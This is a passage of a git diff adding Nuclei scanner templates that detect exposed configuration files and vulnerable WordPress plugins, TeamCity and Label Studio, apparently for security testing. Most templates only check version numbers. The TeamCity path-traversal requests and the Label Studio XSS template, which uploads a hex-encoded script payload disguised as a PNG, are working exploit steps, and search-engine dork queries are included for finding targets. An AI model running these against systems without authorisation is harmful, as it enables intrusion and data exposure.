- text/plain - - type: status - status: - - 200 - matchers-condition: and - path: - - '{{BaseURL}}/configuration.php-dist' - method: GET + - method: GET + path: + - "{{BaseURL}}/configuration.php-dist" + + matchers-condition: and + matchers: + - type: word + words: + - "Joomla" + - "JConfig" + - "@package" + condition: and + + - type: word + words: + - "text/plain" + part: header + + - type: status + status: + - 200 diff --git a/poc/config/openstack-config.yaml b/poc/config/openstack-config.yaml new file mode 100644 index 0000000000..d213636eeb --- /dev/null +++ b/poc/config/openstack-config.yaml @@ -0,0 +1,41 @@ +id: openstack-config + +info: + name: Openstack - Infomation Disclosure + author: MayankPandey01 + severity: low + description: | + Openstack exposing Configuration or settings related to the Swift object storage system. + reference: + - https://docs.openstack.org/python-cloudkittyclient/stein/api_reference/info.html + metadata: + max-request: 2 + shodan-query: http.favicon.hash:786533217 + tags: exposure,misconfig,openstack + +http: + - method: GET + path: + - "{{BaseURL}}/info" + - "{{BaseURL}}/v1/info" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + words: + - '{"formpost"' + - '"bulk_' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100c504ae86098c92cdf1075b41054fd034ae21ecebd6d3aba49a10adb53a4c2356022100915148716537ac9841a78f79df37fb16c699ac1852fec8448ebb9746215f4d40:922c64590222798bb761d5b6d8e72950 diff --git a/poc/config/weaver-mysql-config-info-leak.yaml b/poc/config/weaver-mysql-config-info-leak.yaml new file mode 100644 index 0000000000..85dad0d119 --- /dev/null +++ b/poc/config/weaver-mysql-config-info-leak.yaml @@ -0,0 +1,30 @@ +id: weaver-mysql-config-exposure + +info: + name: OA E-Office mysql_config.ini - Information Disclosure + author: SleepingBag945 + severity: high + description: | + E-Office mysql_config.ini file can be directly accessed, leaking database account password and other information + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA%20E-Office%20mysql_config.ini%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: app="泛微-EOffice" + tags: ecology,weaver,oa,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/mysql_config.ini" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header,"text/plain")' + - 'contains_all(body,"datapassword", "datauser")' + condition: and + +# digest: 4a0a00473045022003d14acb438bcd3ddfaab392c67ae2d0fd30ddbe80da964d403b0403eee025dd022100d6c9d8d5b6864cd317a1b28d3c9a5eeb35e4a0bbfb64a43f01c526d2a5e63070:922c64590222798bb761d5b6d8e72950 diff --git a/poc/config/wp-superstorefinder-misconfig.yaml b/poc/config/wp-superstorefinder-misconfig.yaml new file mode 100644 index 0000000000..a1a731a66a --- /dev/null +++ b/poc/config/wp-superstorefinder-misconfig.yaml @@ -0,0 +1,33 @@ +id: wp-superstorefinder-misconfig + +info: + name: Superstorefinder WP-plugin - Security Misconfigurations + author: r3Y3r53 + severity: medium + description: | + Security misconfiguration is a common security issue that occurs when a system, application, or network is not properly configured to protect against threats and vulnerabilities. + reference: + - https://cxsecurity.com/issue/WLB-2021010145 + - https://www.exploitalert.com/view-details.html?id=36983 + metadata: + verified: true + max-request: 1 + publicwww-query: /wp-content/plugins/superstorefinder-wp/ + google-query: inurl:"wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/exportAjax.php" + tags: wordpress,wp-plugin,superstorefinder-wp,wp,misconfig + +http: + - raw: + - | + GET /wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/exportAjax.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "Name") && contains(body, "CategoriesTags") && contains(body, "email")' + - 'contains(content_type, "text/html")' + condition: and + +# digest: 490a0046304402205624314a7fa843184b0006a4166011527395e568b8ad05b057c6736e989da9ba02200811b24c1e44539543fbb7c61236aa51bea06d2e84315390ed2377fb5f156f91:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2019-25212.yaml b/poc/cve/CVE-2019-25212.yaml new file mode 100644 index 0000000000..1404981387 --- /dev/null +++ b/poc/cve/CVE-2019-25212.yaml @@ -0,0 +1,59 @@ +id: CVE-2019-25212 + +info: + name: > + video carousel slider with lightbox <= 1.0.6 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + The video carousel slider with lightbox plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/85e70be3-3ed7-4ce1-a20c-046fb7c4ec31?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2019-25212 + metadata: + fofa-query: "wp-content/plugins/wp-responsive-video-gallery-with-lightbox/" + google-query: inurl:"/wp-content/plugins/wp-responsive-video-gallery-with-lightbox/" + shodan-query: 'vuln:CVE-2019-25212' + tags: cve,wordpress,wp-plugin,wp-responsive-video-gallery-with-lightbox,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-responsive-video-gallery-with-lightbox/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-responsive-video-gallery-with-lightbox" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.6') \ No newline at end of file diff --git a/poc/cve/CVE-2023-47115.yaml b/poc/cve/CVE-2023-47115.yaml new file mode 100644 index 0000000000..c006620cf3 --- /dev/null +++ b/poc/cve/CVE-2023-47115.yaml @@ -0,0 +1,96 @@ +id: CVE-2023-47115 + +info: + name: Label Studio - Cross-Site Scripting + author: isacaya + severity: high + description: | + Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website. + impact: | + Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. + remediation: | + Update to version 1.9.2. + reference: + - https://github.com/advisories/GHSA-q68h-xwq5-mm7x + - https://docs.djangoproject.com/en/4.2/ref/views/#serving-files-in-development + - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/functions.py#L18-L49 + - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/urls.py#L25-L26 + - https://nvd.nist.gov/vuln/detail/CVE-2023-47115 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L + cvss-score: 7.1 + cve-id: CVE-2023-47115 + cwe-id: CWE-79 + metadata: + max-request: 6 + verified: true + shodan-query: http.favicon.hash:-1649949475 + tags: cve,cve2023,xss,authenticated,intrusive,label-studio + +http: + - raw: + - | + GET /user/login/ HTTP/1.1 + Host: {{Hostname}} + + - | + POST /user/signup/?&next=/projects/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false + + - | + GET /api/current-user/whoami HTTP/1.1 + Host: {{Hostname}} + + - | + POST /api/users/{{id}}/avatar/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF + + ------WebKitFormBoundarytZZRQ9D2LS0PMsHF + Content-Disposition: form-data; name="avatar"; filename="nuclei.html" + Content-Type: image/png + + {{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}} + ------WebKitFormBoundarytZZRQ9D2LS0PMsHF + + - | + GET /api/current-user/whoami HTTP/1.1 + Host: {{Hostname}} + + - | + GET {{filename}} HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: xpath + name: csrftoken + internal: true + attribute: value + xpath: + - '/html/body/div/form/input' + + - type: json + part: body + name: id + internal: true + json: + - '.id' + + - type: json + part: body + name: filename + internal: true + json: + - '.avatar' + + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "contains(header, 'text/html')" + - 'contains(body, "")' + condition: and +# digest: 4a0a004730450221008999745df0370a0f36f1d91079345bb01c335595f037e4fd623dd2ff3a725d6c02200997bd78ea3074a15dd1d76378aa1cf7d1286e84d5d7282642e400804ab42ab7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2024-27199.yaml b/poc/cve/CVE-2024-27199.yaml new file mode 100644 index 0000000000..feb849520c --- /dev/null +++ b/poc/cve/CVE-2024-27199.yaml @@ -0,0 +1,37 @@ +id: CVE-2024-27199 + +info: + name: TeamCity < 2023.11.4 - Authentication Bypass + author: DhiyaneshDk + severity: high + description: | + In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible + reference: + - https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-27199 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cwe-id: CWE-23 + metadata: + verified: true + max-request: 3 + shodan-query: http.component:"TeamCity" + tags: cve,cve2024,teamcity,jetbrains,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/res/../admin/diagnostic.jsp" + - "{{BaseURL}}/.well-known/acme-challenge/../../admin/diagnostic.jsp" + - "{{BaseURL}}/update/../admin/diagnostic.jsp" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "text/html")' + - 'contains_all(body, "Debug Logging", "CPU & Memory Usage")' + condition: and +# digest: 490a0046304402207d46ec6991f8498ff8c74ec6ebfe0f59f19210620cab88c23c7761c7701b640102201246e4baea4f5b436b45be21c4f66bbe35e8a5f3769b78de38ee94253f331fa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2024-5416.yaml b/poc/cve/CVE-2024-5416.yaml new file mode 100644 index 0000000000..e180247900 --- /dev/null +++ b/poc/cve/CVE-2024-5416.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5416 + +info: + name: > + Elementor Website Builder – More than Just a Page Builder <= 3.23.4 - Authenticated (Contributor+) Stored Cross-Site Scripting in the URL Parameter in Multiple Widgets + author: topscoder + severity: low + description: > + The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the url parameter of multiple widgets in all versions up to, and including, 3.23.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in Elementor Editor pages. This was partially patched in version 3.23.2. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a99a64f7-1ea8-4de6-b24f-1f69bf25c1f5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-5416 + metadata: + fofa-query: "wp-content/plugins/elementor/" + google-query: inurl:"/wp-content/plugins/elementor/" + shodan-query: 'vuln:CVE-2024-5416' + tags: cve,wordpress,wp-plugin,elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.23.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6335.yaml b/poc/cve/CVE-2024-6335.yaml new file mode 100644 index 0000000000..39fddb3c25 --- /dev/null +++ b/poc/cve/CVE-2024-6335.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6335 + +info: + name: > + Tracking Code Manager <= 2.2.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Tracking Code Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9bd1fe45-8518-429b-94d3-cc0ea06ca1b4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6335 + metadata: + fofa-query: "wp-content/plugins/tracking-code-manager/" + google-query: inurl:"/wp-content/plugins/tracking-code-manager/" + shodan-query: 'vuln:CVE-2024-6335' + tags: cve,wordpress,wp-plugin,tracking-code-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tracking-code-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tracking-code-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7626.yaml b/poc/cve/CVE-2024-7626.yaml new file mode 100644 index 0000000000..871445df87 --- /dev/null +++ b/poc/cve/CVE-2024-7626.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7626 + +info: + name: > + WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) <= 1.6.9 - Improper Path Validation to Authenticated (Subscriber+) Arbitrary File Move and Read + author: topscoder + severity: low + description: > + The WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) plugin for WordPress is vulnerable to arbitrary file movement and reading due to insufficient file path validation in the save_edit_profile_details() function in all versions up to, and including, 1.6.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to move arbitrary files on the server, which can easily lead to remote code execution when the right file is moved (such as wp-config.php). This can also lead to the reading of arbitrary files that may contain sensitive information like wp-config.php. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c98bb53-9f7e-4ab3-9676-e3dbfb4a0519?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N + cvss-score: 8.1 + cve-id: CVE-2024-7626 + metadata: + fofa-query: "wp-content/plugins/delicious-recipes/" + google-query: inurl:"/wp-content/plugins/delicious-recipes/" + shodan-query: 'vuln:CVE-2024-7626' + tags: cve,wordpress,wp-plugin,delicious-recipes,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/delicious-recipes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "delicious-recipes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7721.yaml b/poc/cve/CVE-2024-7721.yaml new file mode 100644 index 0000000000..92656f4254 --- /dev/null +++ b/poc/cve/CVE-2024-7721.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7721 + +info: + name: > + HTML5 Video Player – mp4 Video Player Plugin and Block <= 2.5.34 - Missing Authorization to Authenticated (Subscriber+) Limited Options Update + author: topscoder + severity: low + description: > + The HTML5 Video Player – mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_password' function in all versions up to, and including, 2.5.34. This makes it possible for authenticated attackers, with Subscriber-level access and above, to set any options that are not explicitly checked as false to an array, including enabling user registration if it has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6dc3f308-d1e1-430b-bccd-168c0972fe7c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7721 + metadata: + fofa-query: "wp-content/plugins/html5-video-player/" + google-query: inurl:"/wp-content/plugins/html5-video-player/" + shodan-query: 'vuln:CVE-2024-7721' + tags: cve,wordpress,wp-plugin,html5-video-player,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "html5-video-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.34') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7727.yaml b/poc/cve/CVE-2024-7727.yaml new file mode 100644 index 0000000000..977bf07998 --- /dev/null +++ b/poc/cve/CVE-2024-7727.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7727 + +info: + name: > + HTML5 Video Player – mp4 Video Player Plugin and Block <= 2.5.32 - Missing Authorization in multiple functions via h5vp_ajax_handler + author: topscoder + severity: high + description: > + The HTML5 Video Player – mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on multiple functions called via the 'h5vp_ajax_handler' ajax action in all versions up to, and including, 2.5.32. This makes it possible for unauthenticated attackers to call these functions to manipulate data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/908df18e-7178-4d40-becb-86e1a714a7da?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-7727 + metadata: + fofa-query: "wp-content/plugins/html5-video-player/" + google-query: inurl:"/wp-content/plugins/html5-video-player/" + shodan-query: 'vuln:CVE-2024-7727' + tags: cve,wordpress,wp-plugin,html5-video-player,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "html5-video-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.32') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8045.yaml b/poc/cve/CVE-2024-8045.yaml new file mode 100644 index 0000000000..62947a6422 --- /dev/null +++ b/poc/cve/CVE-2024-8045.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8045 + +info: + name: > + Advanced WordPress Backgrounds <= 1.12.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via imageTag Parameter + author: topscoder + severity: low + description: > + The Advanced WordPress Backgrounds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘imageTag’ parameter in all versions up to, and including, 1.12.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/78e49869-5e7e-45f2-8239-4df18b28db53?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8045 + metadata: + fofa-query: "wp-content/plugins/advanced-backgrounds/" + google-query: inurl:"/wp-content/plugins/advanced-backgrounds/" + shodan-query: 'vuln:CVE-2024-8045' + tags: cve,wordpress,wp-plugin,advanced-backgrounds,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/advanced-backgrounds/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "advanced-backgrounds" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.12.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8253.yaml b/poc/cve/CVE-2024-8253.yaml new file mode 100644 index 0000000000..58d9f544cb --- /dev/null +++ b/poc/cve/CVE-2024-8253.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8253 + +info: + name: > + Post Grid and Gutenberg Blocks 2.2.87 - 2.2.90 - Authenticated (Subscriber+) Privilege Escalation + author: topscoder + severity: low + description: > + The Post Grid and Gutenberg Blocks plugin for WordPress is vulnerable to privilege escalation in all versions 2.2.87 to 2.2.90. This is due to the plugin not properly restricting what user meta values can be updated and ensuring a form is active. This makes it possible for authenticated attackers, with subscriber-level access and above, to update their user meta to become an administrator. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5f18cae-b7f8-4afd-adfa-c616c63f9419?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-8253 + metadata: + fofa-query: "wp-content/plugins/post-grid/" + google-query: inurl:"/wp-content/plugins/post-grid/" + shodan-query: 'vuln:CVE-2024-8253' + tags: cve,wordpress,wp-plugin,post-grid,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-grid/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-grid" + part: body + + - type: dsl + dsl: + - compare_versions(version, '>= 2.2.87', '<= 2.2.90') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8277.yaml b/poc/cve/CVE-2024-8277.yaml new file mode 100644 index 0000000000..5530d1b4a1 --- /dev/null +++ b/poc/cve/CVE-2024-8277.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8277 + +info: + name: > + WooCommerce Photo Reviews Premium <= 1.3.13.2 - Authentication Bypass to Account Takeover and Privilege Escalation + author: topscoder + severity: critical + description: > + The WooCommerce Photo Reviews Premium plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.3.13.2. This is due to the plugin not properly validating what user transient is being used in the login() function and not properly verifying the user's identity. This makes it possible for unauthenticated attackers to log in as user that has dismissed an admin notice in the past 30 days, which is often an administrator. Alternatively, a user can log in as any user with any transient that has a valid user_id as the value, though it would be more difficult to exploit this successfully. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a1e2d370-a716-4d6b-8e23-74db2fbd0760?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-8277 + metadata: + fofa-query: "wp-content/plugins/woocommerce-photo-reviews/" + google-query: inurl:"/wp-content/plugins/woocommerce-photo-reviews/" + shodan-query: 'vuln:CVE-2024-8277' + tags: cve,wordpress,wp-plugin,woocommerce-photo-reviews,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-photo-reviews/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-photo-reviews" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.13.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8440.yaml b/poc/cve/CVE-2024-8440.yaml new file mode 100644 index 0000000000..d202c64bb2 --- /dev/null +++ b/poc/cve/CVE-2024-8440.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8440 + +info: + name: > + Essential Addons for Elementor -- Best Elementor Templates, Widgets, Kits & WooCommerce Builders <= 6.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Fancy Text Widget + author: topscoder + severity: low + description: > + The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Fancy Text widget in all versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c5960396-5320-4978-aa82-2e33700daa43?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8440 + metadata: + fofa-query: "wp-content/plugins/essential-addons-for-elementor-lite/" + google-query: inurl:"/wp-content/plugins/essential-addons-for-elementor-lite/" + shodan-query: 'vuln:CVE-2024-8440' + tags: cve,wordpress,wp-plugin,essential-addons-for-elementor-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "essential-addons-for-elementor-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.0.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8522-29b9e24c70ba3cd60461931eec1fd527.yaml b/poc/cve/CVE-2024-8522-29b9e24c70ba3cd60461931eec1fd527.yaml new file mode 100644 index 0000000000..547d9580aa --- /dev/null +++ b/poc/cve/CVE-2024-8522-29b9e24c70ba3cd60461931eec1fd527.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8522-29b9e24c70ba3cd60461931eec1fd527 + +info: + name: > + LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields' + author: topscoder + severity: critical + description: > + The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e495507d-7eac-4f38-ab6f-b8f0809b2be4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-8522 + metadata: + fofa-query: "wp-content/plugins/learnpress/" + google-query: inurl:"/wp-content/plugins/learnpress/" + shodan-query: 'vuln:CVE-2024-8522' + tags: cve,wordpress,wp-plugin,learnpress,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learnpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8529-e2a9975debb93f28e1a8c207f744d964.yaml b/poc/cve/CVE-2024-8529-e2a9975debb93f28e1a8c207f744d964.yaml new file mode 100644 index 0000000000..fee43e24ab --- /dev/null +++ 